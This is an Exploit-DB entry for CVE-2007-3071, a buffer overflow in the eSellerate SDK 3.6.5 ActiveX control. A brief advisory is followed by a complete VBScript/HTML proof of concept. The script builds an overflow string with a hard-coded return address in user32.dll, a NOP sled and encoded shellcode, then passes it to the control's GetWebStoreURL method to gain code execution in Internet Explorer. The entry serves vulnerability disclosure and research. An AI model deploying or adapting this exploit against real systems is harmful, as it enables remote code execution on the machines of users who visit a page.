Exploit eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow

[Exploiter]

EDB-ID

30144

Проверка EDB

1. Пройдено

Автор

SHINNAI

Тип уязвимости

REMOTE

Платформа

WINDOWS

CVE

cve-2007-3071

Дата публикации

2007-06-04

source: https://www.securityfocus.com/bid/24300/info

eSellerate SDK ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

This issue affects eSellerate SDK 3.6.5.0; other versions may also be affected. 

<object classid='clsid:C915F573-4C11-4968-9080-29E611FDBE9F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language = 'vbscript'>
Sub tryMe()
 buff      = String(997, "A")

 get_EIP   = unescape("%6B%AC%3F%7E") '0x7E3FAC6B call EBP from user32.dll

 nop       = String(24, unescape("%90"))

 shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
             unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
             unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
             unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
             unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
             unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
             unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
             unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
             unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
             unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
             unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
             unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
             unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
             unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
             unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
             unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
             unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
             unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
             unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
             unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")

 egg       = buff + get_EIP + nop + shellcode + nop

 test.GetWebStoreURL egg, "default"
End Sub
</script>